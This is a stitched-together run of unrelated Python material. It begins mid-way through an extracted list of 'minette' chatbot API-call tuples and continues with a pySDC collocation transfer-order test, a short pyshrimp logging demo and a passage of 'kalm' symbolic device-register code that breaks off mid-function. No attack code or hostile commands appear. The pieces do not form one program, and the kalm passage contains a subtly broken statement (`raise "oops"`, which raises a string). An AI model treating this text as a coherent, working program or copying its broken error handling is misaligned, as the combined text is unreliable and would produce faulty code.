'Minette', ([], {'config': 'config', 'timezone': 'tz', 'logger': 'logger', 'data_stores': 'data_stores', 'default_dialog_service': 'default_dialog_service', 'dialog_router': 'dialog_router', 'custom_router_arg': 'custom_router_arg', 'tagger': 'tagger', 'prepare_table': '(True)'}), '(config=config, timezone=tz, logger=logger, data_stores=data_stores,\n default_dialog_service=default_dialog_service, dialog_router=\n dialog_router, custom_router_arg=custom_router_arg, tagger=tagger,\n prepare_table=True)\n', (5760, 5989), False, 'from minette import Minette, DialogService, SQLiteConnectionProvider, SQLiteContextStore, SQLiteUserStore, SQLiteMessageLogStore, Tagger, Config, DialogRouter, StoreSet, Message, User, Group, DependencyContainer, Payload\n'), ((6711, 6738), 'minette.Minette', 'Minette', ([], {'prepare_table': '(True)'}), '(prepare_table=True)\n', (6718, 6738), False, 'from 
minette import Minette, DialogService, SQLiteConnectionProvider, SQLiteContextStore, SQLiteUserStore, SQLiteMessageLogStore, Tagger, Config, DialogRouter, StoreSet, Message, User, Group, DependencyContainer, Payload\n'), ((8057, 8084), 'minette.Minette', 'Minette', ([], {'prepare_table': '(True)'}), '(prepare_table=True)\n', (8064, 8084), False, 'from minette import Minette, DialogService, SQLiteConnectionProvider, SQLiteContextStore, SQLiteUserStore, SQLiteMessageLogStore, Tagger, Config, DialogRouter, StoreSet, Message, User, Group, DependencyContainer, Payload\n'), ((8732, 8759), 'minette.Minette', 'Minette', ([], {'prepare_table': '(True)'}), '(prepare_table=True)\n', (8739, 8759), False, 'from minette import Minette, DialogService, SQLiteConnectionProvider, SQLiteContextStore, SQLiteUserStore, SQLiteMessageLogStore, Tagger, Config, DialogRouter, StoreSet, Message, User, Group, DependencyContainer, Payload\n'), ((10942, 10969), 'minette.Minette', 'Minette', ([], {'prepare_table': '(True)'}), '(prepare_table=True)\n', (10949, 10969), False, 'from minette import Minette, DialogService, SQLiteConnectionProvider, SQLiteContextStore, SQLiteUserStore, SQLiteMessageLogStore, Tagger, Config, DialogRouter, StoreSet, Message, User, Group, DependencyContainer, Payload\n'), ((11732, 11772), 'minette.Minette', 'Minette', ([], {'default_dialog_service': 'MyDialog'}), '(default_dialog_service=MyDialog)\n', (11739, 11772), False, 'from minette import Minette, DialogService, SQLiteConnectionProvider, SQLiteContextStore, SQLiteUserStore, SQLiteMessageLogStore, Tagger, Config, DialogRouter, StoreSet, Message, User, Group, DependencyContainer, Payload\n'), ((11883, 11923), 'minette.Minette', 'Minette', ([], {'default_dialog_service': 'MyDialog'}), '(default_dialog_service=MyDialog)\n', (11890, 11923), False, 'from minette import Minette, DialogService, SQLiteConnectionProvider, SQLiteContextStore, SQLiteUserStore, SQLiteMessageLogStore, Tagger, Config, DialogRouter, StoreSet, Message, User, Group, DependencyContainer, Payload\n'), ((12063, 12103), 'minette.Minette', 'Minette', ([], {'default_dialog_service': 'MyDialog'}), '(default_dialog_service=MyDialog)\n', (12070, 12103), False, 'from minette import Minette, DialogService, SQLiteConnectionProvider, SQLiteContextStore, SQLiteUserStore, SQLiteMessageLogStore, Tagger, Config, DialogRouter, StoreSet, Message, User, Group, DependencyContainer, Payload\n'), ((12253, 12296), 'minette.Minette', 'Minette', ([], {'default_dialog_service': 'ErrorDialog'}), '(default_dialog_service=ErrorDialog)\n', (12260, 12296), False, 'from minette import Minette, DialogService, SQLiteConnectionProvider, SQLiteContextStore, SQLiteUserStore, SQLiteMessageLogStore, Tagger, Config, DialogRouter, StoreSet, Message, User, Group, DependencyContainer, Payload\n'), ((12664, 12729), 'minette.Minette', 'Minette', ([], {'default_dialog_service': 'TaggerDialog', 'tagger': 'JanomeTagger'}), '(default_dialog_service=TaggerDialog, tagger=JanomeTagger)\n', (12671, 12729), False, 'from minette import Minette, DialogService, SQLiteConnectionProvider, SQLiteContextStore, SQLiteUserStore, SQLiteMessageLogStore, Tagger, Config, DialogRouter, StoreSet, Message, User, Group, DependencyContainer, Payload\n'), ((13105, 13195), 'minette.Minette', 'Minette', ([], {'default_dialog_service': 'TaggerDialog', 'tagger': 'JanomeTagger', 'tagger_max_length': '(0)'}), '(default_dialog_service=TaggerDialog, tagger=JanomeTagger,\n tagger_max_length=0)\n', (13112, 13195), False, 'from minette import Minette, 
DialogService, SQLiteConnectionProvider, SQLiteContextStore, SQLiteUserStore, SQLiteMessageLogStore, Tagger, Config, DialogRouter, StoreSet, Message, User, Group, DependencyContainer, Payload\n'), ((13449, 13553), 'minette.Minette', 'Minette', ([], {'default_dialog_service': 'TaggerManuallyParseDialog', 'tagger': 'JanomeTagger', 'tagger_max_length': '(0)'}), '(default_dialog_service=TaggerManuallyParseDialog, tagger=\n JanomeTagger, tagger_max_length=0)\n', (13456, 13553), False, 'from minette import Minette, DialogService, SQLiteConnectionProvider, SQLiteContextStore, SQLiteUserStore, SQLiteMessageLogStore, Tagger, Config, DialogRouter, StoreSet, Message, User, Group, DependencyContainer, Payload\n'), ((13973, 14086), 'minette.Minette', 'Minette', ([], {'default_dialog_service': 'TaggerManuallyParseGeneratorDialog', 'tagger': 'JanomeTagger', 'tagger_max_length': '(0)'}), '(default_dialog_service=TaggerManuallyParseGeneratorDialog, tagger=\n JanomeTagger, tagger_max_length=0)\n', (13980, 14086), False, 'from minette import Minette, DialogService, SQLiteConnectionProvider, SQLiteContextStore, SQLiteUserStore, SQLiteMessageLogStore, Tagger, Config, DialogRouter, StoreSet, Message, User, Group, DependencyContainer, Payload\n'), ((14805, 14814), 'minette.Minette', 'Minette', ([], {}), '()\n', (14812, 14814), False, 'from minette import Minette, DialogService, SQLiteConnectionProvider, SQLiteContextStore, SQLiteUserStore, SQLiteMessageLogStore, Tagger, Config, DialogRouter, StoreSet, Message, User, Group, DependencyContainer, Payload\n'), ((15224, 15233), 'minette.Minette', 'Minette', ([], {}), '()\n', (15231, 15233), False, 'from minette import Minette, DialogService, SQLiteConnectionProvider, SQLiteContextStore, SQLiteUserStore, SQLiteMessageLogStore, Tagger, Config, DialogRouter, StoreSet, Message, User, Group, DependencyContainer, Payload\n'), ((587, 608), 'minette.utils.date_to_unixtime', 'date_to_unixtime', (['now'], {}), '(now)\n', (603, 608), False, 'from minette.utils import date_to_unixtime\n'), ((2724, 2739), 'pytz.timezone', 'timezone', (['"""UTC"""'], {}), "('UTC')\n", (2732, 2739), False, 'from pytz import timezone\n'), ((3277, 3299), 'pytz.timezone', 'timezone', (['"""Asia/Tokyo"""'], {}), "('Asia/Tokyo')\n", (3285, 3299), False, 'from pytz import timezone\n'), ((5166, 5188), 'pytz.timezone', 'timezone', (['"""Asia/Tokyo"""'], {}), "('Asia/Tokyo')\n", (5174, 5188), False, 'from pytz import timezone\n'), ((6136, 6158), 'pytz.timezone', 'timezone', (['"""Asia/Tokyo"""'], {}), "('Asia/Tokyo')\n", (6144, 6158), False, 'from pytz import timezone\n'), ((7316, 7387), 'minette.Message', 'Message', ([], {'text': '"""hello"""', 'channel': '"""get_user_test"""', 'channel_user_id': 'user_id'}), "(text='hello', channel='get_user_test', channel_user_id=user_id)\n", (7323, 7387), False, 'from minette import Minette, DialogService, SQLiteConnectionProvider, SQLiteContextStore, SQLiteUserStore, SQLiteMessageLogStore, Tagger, Config, DialogRouter, StoreSet, Message, User, Group, DependencyContainer, Payload\n'), ((7708, 7808), 'minette.Message', 'Message', ([], {'text': '"""hello"""', 'channel': '"""get_user_test"""', 'channel_detail': '"""detail"""', 'channel_user_id': 'user_id'}), "(text='hello', channel='get_user_test', channel_detail='detail',\n channel_user_id=user_id)\n", (7715, 7808), False, 'from minette import Minette, DialogService, SQLiteConnectionProvider, SQLiteContextStore, SQLiteUserStore, SQLiteMessageLogStore, Tagger, Config, DialogRouter, StoreSet, Message, User, Group, 
DependencyContainer, Payload\n'), ((8428, 8500), 'minette.Message', 'Message', ([], {'text': '"""hello"""', 'channel': '"""save_user_test"""', 'channel_user_id': 'user_id'}), "(text='hello', channel='save_user_test', channel_user_id=user_id)\n", (8435, 8500), False, 'from minette import Minette, DialogService, SQLiteConnectionProvider, SQLiteContextStore, SQLiteUserStore, SQLiteMessageLogStore, Tagger, Config, DialogRouter, StoreSet, Message, User, Group, DependencyContainer, Payload\n'), ((9029, 9050), 'minette.utils.date_to_unixtime', 'date_to_unixtime', (['now'], {}), '(now)\n', (9045, 9050), False, 'from minette.utils import date_to_unixtime\n'), ((9290, 9311), 'minette.utils.date_to_unixtime', 'date_to_unixtime', (['now'], {}), '(now)\n', (9306, 9311), False, 'from minette.utils import date_to_unixtime\n'), ((9555, 9576), 'minette.utils.date_to_unixtime', 'date_to_unixtime', (['now'], {}), '(now)\n', (9571, 9576), False, 'from minette.utils import date_to_unixtime\n'), ((9676, 9750), 'minette.Message', 'Message', ([], {'text': '"""hello"""', 'channel': '"""get_context_test"""', 'channel_user_id': 'user_id'}), "(text='hello', channel='get_context_test', channel_user_id=user_id)\n", (9683, 9750), False, 'from minette import Minette, DialogService, SQLiteConnectionProvider, SQLiteContextStore, SQLiteUserStore, SQLiteMessageLogStore, Tagger, Config, DialogRouter, StoreSet, Message, User, Group, DependencyContainer, Payload\n'), ((10037, 10111), 'minette.Message', 'Message', ([], {'text': '"""hello"""', 'channel': '"""get_context_test"""', 'channel_user_id': 'user_id'}), "(text='hello', channel='get_context_test', channel_user_id=user_id)\n", (10044, 10111), False, 'from minette import Minette, DialogService, SQLiteConnectionProvider, SQLiteContextStore, SQLiteUserStore, SQLiteMessageLogStore, Tagger, Config, DialogRouter, StoreSet, Message, User, Group, DependencyContainer, Payload\n'), ((10149, 10177), 'minette.Group', 'Group', ([], {'id': "('group_' + user_id)"}), "(id='group_' + user_id)\n", (10154, 10177), False, 'from minette import Minette, DialogService, SQLiteConnectionProvider, SQLiteContextStore, SQLiteUserStore, SQLiteMessageLogStore, Tagger, Config, DialogRouter, StoreSet, Message, User, Group, DependencyContainer, Payload\n'), ((10549, 10652), 'minette.Message', 'Message', ([], {'text': '"""hello"""', 'channel': '"""get_context_test"""', 'channel_detail': '"""detail"""', 'channel_user_id': 'user_id'}), "(text='hello', channel='get_context_test', channel_detail='detail',\n channel_user_id=user_id)\n", (10556, 10652), False, 'from minette import Minette, DialogService, SQLiteConnectionProvider, SQLiteContextStore, SQLiteUserStore, SQLiteMessageLogStore, Tagger, Config, DialogRouter, StoreSet, Message, User, Group, DependencyContainer, Payload\n'), ((11240, 11261), 'minette.utils.date_to_unixtime', 'date_to_unixtime', (['now'], {}), '(now)\n', (11256, 11261), False, 'from minette.utils import date_to_unixtime\n'), ((11389, 11464), 'minette.Message', 'Message', ([], {'text': '"""hello"""', 'channel': '"""save_context_test"""', 'channel_user_id': 'user_id'}), "(text='hello', channel='save_context_test', channel_user_id=user_id)\n", (11396, 11464), False, 'from minette import Minette, DialogService, SQLiteConnectionProvider, SQLiteContextStore, SQLiteUserStore, SQLiteMessageLogStore, Tagger, Config, DialogRouter, StoreSet, Message, User, Group, DependencyContainer, Payload\n'), ((9966, 9987), 'minette.utils.date_to_unixtime', 'date_to_unixtime', (['now'], {}), '(now)\n', (9982, 
9987), False, 'from minette.utils import date_to_unixtime\n'), ((10391, 10412), 'minette.utils.date_to_unixtime', 'date_to_unixtime', (['now'], {}), '(now)\n', (10407, 10412), False, 'from minette.utils import date_to_unixtime\n'), ((10883, 10904), 'minette.utils.date_to_unixtime', 'date_to_unixtime', (['now'], {}), '(now)\n', (10899, 10904), False, 'from minette.utils import date_to_unixtime\n'), ((11681, 11702), 'minette.utils.date_to_unixtime', 'date_to_unixtime', (['now'], {}), '(now)\n', (11697, 11702), False, 'from minette.utils import date_to_unixtime\n'), ((12452, 12474), 'pytz.timezone', 'timezone', (['"""Asia/Tokyo"""'], {}), "('Asia/Tokyo')\n", (12460, 12474), False, 'from pytz import timezone\n'), ((12586, 12615), 'datetime.datetime.now', 'datetime.now', ([], {'tz': 'bot.timezone'}), '(tz=bot.timezone)\n', (12598, 12615), False, 'from datetime import datetime\n'), ((1772, 1823), 'minette.Payload', 'Payload', ([], {'content_type': '"""data"""', 'content': 'request.words'}), "(content_type='data', content=request.words)\n", (1779, 1823), False, 'from minette import Minette, DialogService, SQLiteConnectionProvider, SQLiteContextStore, SQLiteUserStore, SQLiteMessageLogStore, Tagger, Config, DialogRouter, StoreSet, Message, User, Group, DependencyContainer, Payload\n'), ((2143, 2194), 'minette.Payload', 'Payload', ([], {'content_type': '"""data"""', 'content': 'request.words'}), "(content_type='data', content=request.words)\n", (2150, 2194), False, 'from minette import Minette, DialogService, SQLiteConnectionProvider, SQLiteContextStore, SQLiteUserStore, SQLiteMessageLogStore, Tagger, Config, DialogRouter, StoreSet, Message, User, Group, DependencyContainer, Payload\n'), ((2536, 2587), 'minette.Payload', 'Payload', ([], {'content_type': '"""data"""', 'content': 'request.words'}), "(content_type='data', content=request.words)\n", (2543, 2587), False, 'from minette import Minette, DialogService, SQLiteConnectionProvider, SQLiteContextStore, SQLiteUserStore, SQLiteMessageLogStore, Tagger, Config, DialogRouter, StoreSet, Message, User, Group, DependencyContainer, Payload\n'), ((3475, 3500), 'os.path.abspath', 'os.path.abspath', (['__file__'], {}), '(__file__)\n', (3490, 3500), False, 'import os\n')]
|
import nose
import numpy as np
from numpy.polynomial.polynomial import polyval
import pySDC.helpers.transfer_helper as th
from pySDC.core.Collocation import CollBase
from pySDC.tests.test_helpers import get_derived_from_in_package
classes = []
def setup():
global classes, t_start, t_end
# generate random boundaries for the time slice with 0.0 <= t_start < 0.2 and 0.8 <= t_end < 1.0
t_start = np.random.rand(1) * 0.2
t_end = 0.8 + np.random.rand(1) * 0.2
classes = get_derived_from_in_package(CollBase, 'pySDC/implementations/collocation_classes')
@nose.tools.with_setup(setup)
def test_Q_transfer():
for collclass in classes:
yield check_Q_transfer, collclass
def check_Q_transfer(collclass):
"""
A simple test program to check the order of the Q interpolation/restriction
"""
for M in range(3, 9):
Mfine = M
Mcoarse = int((Mfine+1)/2.0)
coll_fine = collclass(Mfine, 0, 1)
coll_coarse = collclass(Mcoarse, 0, 1)
assert coll_fine.left_is_node == coll_coarse.left_is_node, 'ERROR: should be using the same class for coarse and fine Q'
fine_grid = coll_fine.nodes
coarse_grid = coll_coarse.nodes
for order in range(2,coll_coarse.num_nodes+1):
Pcoll = th.interpolation_matrix_1d(fine_grid, coarse_grid, k=order, pad=0, equidist_nested=False)
Rcoll = th.restriction_matrix_1d(fine_grid, coarse_grid, k=order, pad=0)
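            # a transfer of order k should reproduce polynomials of degree < k exactly and be inexact above that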
for polyorder in range(1,order+2):
coeff = np.random.rand(polyorder)
ufine = polyval(fine_grid,coeff)
ucoarse = polyval(coarse_grid,coeff)
uinter = Pcoll.dot(ucoarse)
urestr = Rcoll.dot(ufine)
err_inter = np.linalg.norm(uinter-ufine, np.inf)
err_restr = np.linalg.norm(urestr-ucoarse, np.inf)
if polyorder <= order:
assert err_inter < 2E-15, "ERROR: Q-interpolation order is not reached, got %s" %err_inter
assert err_restr < 2E-15, "ERROR: Q-restriction order is not reached, got %s" % err_restr
else:
assert err_inter > 2E-15, "ERROR: Q-interpolation order is higher than expected, got %s" % polyorder
@nose.tools.with_setup(setup)
def test_Q_transfer_minimal():
for collclass in classes:
yield check_Q_transfer_minimal, collclass
def check_Q_transfer_minimal(collclass):
"""
A simple test program to check the order of the Q interpolation/restriction for only 2 coarse nodes
"""
Mcoarse = 2
coll_coarse = collclass(Mcoarse, 0, 1)
for M in range(3, 9):
Mfine = M
coll_fine = collclass(Mfine, 0, 1)
assert coll_fine.left_is_node == coll_coarse.left_is_node, 'ERROR: should be using the same class for coarse and fine Q'
fine_grid = coll_fine.nodes
coarse_grid = coll_coarse.nodes
Pcoll = th.interpolation_matrix_1d(fine_grid, coarse_grid, k=2, pad=0, equidist_nested=False)
Rcoll = th.restriction_matrix_1d(fine_grid, coarse_grid, k=2, pad=0)
for polyorder in range(1,3):
coeff = np.random.rand(polyorder)
ufine = polyval(fine_grid,coeff)
ucoarse = polyval(coarse_grid,coeff)
uinter = Pcoll.dot(ucoarse)
urestr = Rcoll.dot(ufine)
err_inter = np.linalg.norm(uinter-ufine, np.inf)
err_restr = np.linalg.norm(urestr-ucoarse, np.inf)
if polyorder <= 2:
assert err_inter < 2E-15, "ERROR: Q-interpolation order is not reached, got %s" %err_inter
assert err_restr < 2E-15, "ERROR: Q-restriction order is not reached, got %s" % err_restr
else:
assert err_inter > 2E-15, "ERROR: Q-interpolation order is higher than expected, got %s" % polyorder
|
[
"numpy.polynomial.polynomial.polyval",
"numpy.linalg.norm",
"pySDC.helpers.transfer_helper.restriction_matrix_1d",
"pySDC.tests.test_helpers.get_derived_from_in_package",
"numpy.random.rand",
"nose.tools.with_setup",
"pySDC.helpers.transfer_helper.interpolation_matrix_1d"
] |
[((576, 604), 'nose.tools.with_setup', 'nose.tools.with_setup', (['setup'], {}), '(setup)\n', (597, 604), False, 'import nose\n'), ((2290, 2318), 'nose.tools.with_setup', 'nose.tools.with_setup', (['setup'], {}), '(setup)\n', (2311, 2318), False, 'import nose\n'), ((491, 577), 'pySDC.tests.test_helpers.get_derived_from_in_package', 'get_derived_from_in_package', (['CollBase', '"""pySDC/implementations/collocation_classes"""'], {}), "(CollBase,\n 'pySDC/implementations/collocation_classes')\n", (518, 577), False, 'from pySDC.tests.test_helpers import get_derived_from_in_package\n'), ((411, 428), 'numpy.random.rand', 'np.random.rand', (['(1)'], {}), '(1)\n', (425, 428), True, 'import numpy as np\n'), ((2966, 3055), 'pySDC.helpers.transfer_helper.interpolation_matrix_1d', 'th.interpolation_matrix_1d', (['fine_grid', 'coarse_grid'], {'k': '(2)', 'pad': '(0)', 'equidist_nested': '(False)'}), '(fine_grid, coarse_grid, k=2, pad=0,\n equidist_nested=False)\n', (2992, 3055), True, 'import pySDC.helpers.transfer_helper as th\n'), ((3068, 3128), 'pySDC.helpers.transfer_helper.restriction_matrix_1d', 'th.restriction_matrix_1d', (['fine_grid', 'coarse_grid'], {'k': '(2)', 'pad': '(0)'}), '(fine_grid, coarse_grid, k=2, pad=0)\n', (3092, 3128), True, 'import pySDC.helpers.transfer_helper as th\n'), ((453, 470), 'numpy.random.rand', 'np.random.rand', (['(1)'], {}), '(1)\n', (467, 470), True, 'import numpy as np\n'), ((1288, 1381), 'pySDC.helpers.transfer_helper.interpolation_matrix_1d', 'th.interpolation_matrix_1d', (['fine_grid', 'coarse_grid'], {'k': 'order', 'pad': '(0)', 'equidist_nested': '(False)'}), '(fine_grid, coarse_grid, k=order, pad=0,\n equidist_nested=False)\n', (1314, 1381), True, 'import pySDC.helpers.transfer_helper as th\n'), ((1398, 1462), 'pySDC.helpers.transfer_helper.restriction_matrix_1d', 'th.restriction_matrix_1d', (['fine_grid', 'coarse_grid'], {'k': 'order', 'pad': '(0)'}), '(fine_grid, coarse_grid, k=order, pad=0)\n', (1422, 1462), True, 'import pySDC.helpers.transfer_helper as th\n'), ((3187, 3212), 'numpy.random.rand', 'np.random.rand', (['polyorder'], {}), '(polyorder)\n', (3201, 3212), True, 'import numpy as np\n'), ((3233, 3258), 'numpy.polynomial.polynomial.polyval', 'polyval', (['fine_grid', 'coeff'], {}), '(fine_grid, coeff)\n', (3240, 3258), False, 'from numpy.polynomial.polynomial import polyval\n'), ((3280, 3307), 'numpy.polynomial.polynomial.polyval', 'polyval', (['coarse_grid', 'coeff'], {}), '(coarse_grid, coeff)\n', (3287, 3307), False, 'from numpy.polynomial.polynomial import polyval\n'), ((3411, 3449), 'numpy.linalg.norm', 'np.linalg.norm', (['(uinter - ufine)', 'np.inf'], {}), '(uinter - ufine, np.inf)\n', (3425, 3449), True, 'import numpy as np\n'), ((3472, 3512), 'numpy.linalg.norm', 'np.linalg.norm', (['(urestr - ucoarse)', 'np.inf'], {}), '(urestr - ucoarse, np.inf)\n', (3486, 3512), True, 'import numpy as np\n'), ((1535, 1560), 'numpy.random.rand', 'np.random.rand', (['polyorder'], {}), '(polyorder)\n', (1549, 1560), True, 'import numpy as np\n'), ((1585, 1610), 'numpy.polynomial.polynomial.polyval', 'polyval', (['fine_grid', 'coeff'], {}), '(fine_grid, coeff)\n', (1592, 1610), False, 'from numpy.polynomial.polynomial import polyval\n'), ((1636, 1663), 'numpy.polynomial.polynomial.polyval', 'polyval', (['coarse_grid', 'coeff'], {}), '(coarse_grid, coeff)\n', (1643, 1663), False, 'from numpy.polynomial.polynomial import polyval\n'), ((1779, 1817), 'numpy.linalg.norm', 'np.linalg.norm', (['(uinter - ufine)', 'np.inf'], {}), '(uinter - ufine, np.inf)\n', 
(1793, 1817), True, 'import numpy as np\n'), ((1844, 1884), 'numpy.linalg.norm', 'np.linalg.norm', (['(urestr - ucoarse)', 'np.inf'], {}), '(urestr - ucoarse, np.inf)\n', (1858, 1884), True, 'import numpy as np\n')]
|
#!/usr/bin/env pyshrimp
# $opts: magic
from pyshrimp import log, shell_cmd
print('You can run this as any other script')
print('But then what is the point? :)')
log('You can use log with a bit more details!')
log('The log is initialized by run... but with magic it gets magically invoked!')
log('To do that just add magic to opts: # $opts: magic')
log('The downside is: script will run differently when invoked directly using %> python script.py')
log('Also if you forget to turn on magic those logs will not appear...')
shell_cmd('echo You can also run shell scripts easily', capture=False).exec()
|
[
"pyshrimp.log",
"pyshrimp.shell_cmd"
] |
[((164, 211), 'pyshrimp.log', 'log', (['"""You can use log with a bit more details!"""'], {}), "('You can use log with a bit more details!')\n", (167, 211), False, 'from pyshrimp import log, shell_cmd\n'), ((212, 298), 'pyshrimp.log', 'log', (['"""The log is initialized by run... but with magic it gets magically invoked!"""'], {}), "('The log is initialized by run... but with magic it gets magically invoked!'\n )\n", (215, 298), False, 'from pyshrimp import log, shell_cmd\n'), ((294, 350), 'pyshrimp.log', 'log', (['"""To do that just add magic to opts: # $opts: magic"""'], {}), "('To do that just add magic to opts: # $opts: magic')\n", (297, 350), False, 'from pyshrimp import log, shell_cmd\n'), ((351, 455), 'pyshrimp.log', 'log', (['"""The downside is: script will run differently when invoked directly using %> python script.py"""'], {}), "('The downside is: script will run differently when invoked directly using %> python script.py'\n )\n", (354, 455), False, 'from pyshrimp import log, shell_cmd\n'), ((451, 523), 'pyshrimp.log', 'log', (['"""Also if you forget to turn on magic those logs will not appear..."""'], {}), "('Also if you forget to turn on magic those logs will not appear...')\n", (454, 523), False, 'from pyshrimp import log, shell_cmd\n'), ((525, 595), 'pyshrimp.shell_cmd', 'shell_cmd', (['"""echo You can also run shell scripts easily"""'], {'capture': '(False)'}), "('echo You can also run shell scripts easily', capture=False)\n", (534, 595), False, 'from pyshrimp import log, shell_cmd\n')]
|
import claripy
from kalm import utils
from . import ast_util
from . import spec_act
from . import spec_reg
# TODO: Akvile had put a cache here, which is a good idea since the read-then-write pattern is common;
# I removed it cause it depended on state.globals, but we should put it back somehow
def __constrain_field(symb, start, end, value):
"""
    Sets symb[end:start] = value and returns the resulting bitvector.
"""
if value & (2**(1 + end - start) - 1) != value:
raise Exception(f"The value {value} does not fit in the specified range {symb}[{end}:{start}].")
value = claripy.BVV(value, end - start + 1)
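    # Rebuild the bitvector: keep the untouched high/low slices and splice the constant field in between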
if start == 0:
if end == symb.size() - 1:
return value
return symb[symb.size()-1:end+1].concat(value)
if end == symb.size() - 1:
return value.concat(symb[start-1:0])
return symb[symb.size()-1:end+1].concat(value).concat(symb[start-1:0])
def __init_reg_val_symb(name, data):
"""
Creates and returns a Symbolic Bit Vector for the identified register based on
initial register field values
:param name: the name of the register
:param data: dictionary associated with the register reg
:return: the symbolic register value
"""
symb = claripy.BVS(name, data['length'])
last = 0 # Last unconstrained bit
for field, info in data['fields'].items():
        if info['init'] == 'X': # Floating value can be modeled as unconstrained
last = info['end'] + 1
continue
if last != info['start']: # There is an implicit Reserved block
symb = __constrain_field(symb, last, info['start'] - 1, 0)
last = info['start']
symb = __constrain_field(symb, info['start'], info['end'], info['init'])
last = info['end'] + 1
if last != data['length']: # There is a reserved field at the end
symb = __constrain_field(symb, last, data['length'] - 1, 0)
return symb
def __init_reg_val_con(data):
"""
    Creates and returns a Bit Vector for the identified register based on
initial register field values. Returns None if the register cannot be
made concrete.
:param data: dictionary associated with the register
:return: BVV or None
"""
value = 0
for field, info in data['fields'].items():
        if info['init'] == 'X': # Floating value can be modeled as unconstrained
return None
value = value | (info['init'] << info['start'])
bvv = claripy.BVV(value, data['length'])
return bvv
def get_pci_reg(base, spec):
for name, info in spec.items():
b, m, _ = info['addr'][0]
assert m == 0, "PCI m must be 0"
if b == base:
return name
raise Exception(f"PCI register with address 0x{base:x} is not in the spec.")
def find_reg_from_addr(state, addr, _cache={}):
if len(_cache) == 0:
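        # Build a one-time lookup from concrete register address to (register name, index)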
for reg, data in spec_reg.registers.items():
idx = 0
for b, m, l in data['addr']:
for n in range(0, l+1-idx):
_cache[b + n*m] = (reg, n+idx)
idx += l + 1
"""
Finds which register the address refers to.
:return: the name of the register and its index.
"""
# Optimization: if addr isn't symbolic then deal with it quickly
if not isinstance(addr, claripy.ast.Base) or not addr.symbolic:
conc_addr = state.solver.eval(addr)
cached = _cache.get(conc_addr, None)
if cached is not None:
return cached
for reg, data in spec_reg.registers.items():
len_bytes = data['length'] // 8
idx = 0
for b, m, l in data['addr']:
high = b + (l-idx)*m + len_bytes
if b <= conc_addr and conc_addr < high:
reg_index = 0 if m == 0 else ((conc_addr - b) // m + idx)
if int(reg_index) == reg_index:
reg_index = int(reg_index) # they compare as equal but without this reg_index is still a float
#print(f"{reg}[{reg_index}]")
return reg, reg_index
idx += l + 1
raise Exception("Need to double-check logic below for symbolic indices...")
n = claripy.BVS("n", 64)
for reg, data in spec_reg.registers.items():
len_bytes = data['length'] // 8
p = 0
for b, m, l in data['addr']:
low = b + (n-p)*m
high = low + len_bytes
constraint = (n - p >= 0) & (n <= l) & (low <= addr) & (addr < high)
if utils.definitely_false(state.solver, constraint): # Continue the search
p += l + 1
continue
if m != 0:
n_con = state.solver.eval(n, extra_constraints=[constraint])
#if not (n_con in state.globals['indices']):
# state.globals['indices'] += [n_con]
#print(f"{reg}[{n_con}]")
return reg, n_con
#print(f"{reg}")
return reg, None
raise Exception(f"Cannot find register at {addr}.")
def is_reg_indexed(data):
_, m, _ = data['addr'][0]
return (m != 0)
def fetch_reg(reg_dict, reg, index, data, use_init):
"""
Fetches register from state global store. Initialises it if needed.
"""
if reg in reg_dict:
d = reg_dict[reg]
if is_reg_indexed(data):
if index in d.keys():
return d[index]
#else:
# raise "what do I do here?"
else:
return d
if use_init:
reg_bv = __init_reg_val_con(data)
if reg_bv is None:
# If a concrete value cannot be created, try symbolic
reg_bv = __init_reg_val_symb(reg, data)
else:
reg_bv = claripy.BVS(reg, data['length'])
update_reg(reg_dict, reg, index, data, reg_bv)
return reg_bv
def update_reg(reg_dict, reg, index, data, expr):
"""
Update register value in the state.
:param data: dictionary associated with the register reg
"""
if not is_reg_indexed(data):
reg_dict[reg] = expr
elif reg in reg_dict:
reg_dict[reg][index] = expr
else:
reg_dict[reg] = {index: expr}
def find_fields_on_write(state, prev, new, reg, spec):
"""
Finds which named fields of the register have been changed and
returns this information as a list.
"""
data = spec[reg]
fields = []
for field, info in data['fields'].items():
s = info['start']
e = info['end']
if not (prev[e:s] == new[e:s]).is_true(): #ideally, utils.can_be_false(state.solver, prev[e:s] == new[e:s]), but that's slow so let's be conservative
p = prev[e:s]
n = new[e:s]
fields += [(field, p, n)]
return fields
def check_access_write(old_val, new_val, reg, data, fields):
"""
Determines which fields are written and whether it is legal
to do so.
"""
reg_access = data['access']
if len(fields) == 0 and reg_access == spec_reg.Access.RO:
# NOTE: This permits writing to reserved fields
raise Exception(f"Illegal attempt to write to register {reg}")
for i, f_info in enumerate(fields):
(f, p, n) = f_info
field_access = data['fields'][f]['access']
if field_access == spec_reg.Access.IW:
fields[i] = (fields[i][0],fields[i][1],fields[i][1]) # new is prev
return
illegal = (field_access == spec_reg.Access.NA)
illegal |= (field_access == spec_reg.Access.RO)
if illegal:
raise Exception(f"Illegal attempt to write to {reg}.{f}")
def change_reg_field(state, device, name, index, registers, new):
"""
Changes a single field in a register and saves the new value.
    :param name: register identifier of the form REG.FIELD
:param register: register spec
:param new: new field value. If the field is to be made
symbolic, should be 'X'.
"""
reg, field = name.split('.', 1)
data = registers[reg]
prev = -1
dev_regs = device.regs
if registers == spec_reg.pci_regs:
dev_regs = device.pci_regs
reg_old = fetch_reg(dev_regs, reg, index, data, device.use_init[0])
reg_new = None
f_info = data['fields'][field]
if reg_old.op == 'BVV' and new != 'X':
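        # Old register value and new field value are both concrete: compute the new register value numerically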
val = 0
if f_info['start'] > 0:
before = state.solver.eval_one(reg_old[f_info['start']-1:0])
val = val | before
val = val | (new << f_info['start'])
if f_info['end'] < data['length'] - 1:
after = state.solver.eval_one(reg_old[data['length']-1:f_info['end']+1])
val = val | (after << f_info['end']+1)
reg_new = claripy.BVV(val, data['length'])
else:
if new == 'X':
raise "oops"
value_len = f_info['end'] - f_info['start'] + 1
if f_info['start'] == 0:
reg_new = claripy.BVV(new, value_len)
else:
reg_new = claripy.BVV(new, value_len).concat(reg_old[f_info['start']-1:0])
if f_info['end'] < data['length'] - 1:
reg_new = reg_old[data['length']-1:f_info['end']+1].concat(reg_new)
update_reg(dev_regs, reg, index, data, reg_new)
def verify_write(state, device, fields, reg, index, reg_dict, _cache={}):
"""
Verifies if the write can be matched to an action.
Raises an exception if it can't be matched.
"""
if len(_cache) == 0:
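        # Index the spec actions by the registers they touch so writes can be matched quickly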
for action, info in spec_act.actions.items():
for r in info['action'].getRegisters():
if r in _cache:
_cache[r].append((action, info))
else:
_cache[r] = [(action, info)]
counter = device.counter[0]
for f_info in fields:
(f, prev, new) = f_info
        # Actions whose preconditions fail - useful for debugging
rejected = []
# The write to this field is invalid until a matching
# action is found
valid = False
